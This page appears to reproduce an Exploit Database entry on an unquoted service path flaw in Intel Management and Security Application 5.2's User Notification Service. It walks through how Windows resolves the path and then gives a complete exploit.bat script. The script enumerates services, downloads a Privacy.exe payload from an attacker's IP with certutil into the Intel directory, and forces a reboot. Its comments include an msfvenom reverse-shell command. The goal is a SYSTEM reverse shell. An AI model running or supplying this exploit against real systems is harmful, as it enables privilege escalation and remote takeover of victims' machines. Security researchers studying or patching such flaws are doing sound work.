UNSAFE-INLINE
Search…
Intel(r) Management and Security Application 5.2 - UNS Unquoted Service Path
Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path Privilege Escalation
Intel(r) Management and Security Application User Notification Service (v5.2) path contains spaces and is not surrounded by quotation marks and Windows has to guess where to find the UNS executable that starts automatically. Windows will first consider the space at the end of the filename and interpret everything that follows are arguments passed to that executable.
1
# User Notification Service path:
2
C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
Copied!
1
0x01 Option:
2
File Path: C:\Program
3
Arguments: Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
Copied!
If there is not Program.exe under "C:\" directory, Windows will attempt second option.
1
0x02 Option:
2
File Path: C:\Program Files
3
Arguments: (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
Copied!
If there is not Program Files.exe under "C:\" directory , Windows will attempt third option.
1
0x03 Option:
2
File Path: C:\Program Files (x86)\Common
3
Arguments: Files\Intel\Privacy Icon\UNS\UNS.exe
Copied!
If there is not Common.exe under "C:\Program Files(x86)\" directory , Windows will attempt fourth option.
1
0x04 Option:
2
File Path: C:\Program Files (x86)\Common Files\Intel\Privacy
3
Arguments: Icon\UNS\UNS.exe
Copied!
If there is not Privacy.exe under "C:\Program Files (x86)\Common Files\Intel\" directory , Windows will attempt fifth option.
1
0x05 Option:
2
3
File Path:
4
C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
5
Arguments: <blank>
Copied!
If an user has permission to write one of these directories, mandatory level of user will be elevated as SYSTEM during reboot Windows 7 / 8 machine.
I have discovered this vulnerability on Intel User Notification Service 5.2 , maybe other versions are lower than 5.2 that are affected as well. Privacy.exe was created with mfsvenom and served on port 80. Also, port 443 was used for reverse shell so if there is a firewall in front of target machine, outbound firewall rules allow 80, 443, 53 ports usually.
Using following commands, I elevated mandatory level from high to SYSTEM without special misconfiguration on directory.
exploit.bat:
1
@ECHO OFF
2
ECHO =======================================================================================================================
3
ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation
4
ECHO =======================================================================================================================
5
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
6
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
7
sc qc UNS
8
ECHO [+] Your mandoroty level is:
9
whoami /groups | findstr /B /C:"Mandatory Label"
10
::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
11
::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe
12
ECHO [?]
13
ECHO [+] Enumeration was completed successfully.
14
ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted.
15
PAUSE
16
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe"
17
IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" (
18
ECHO [+] The download was successful.
19
) ELSE (
20
ECHO [-] The download was unsuccessful.
21
PAUSE
22
)
23
ECHO [!] If you continue, system will reboot.
24
PAUSE
25
shutdown /r /t 0
26
::code end
Copied!
Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
Exploit Database
Last modified 10mo ago
Copy link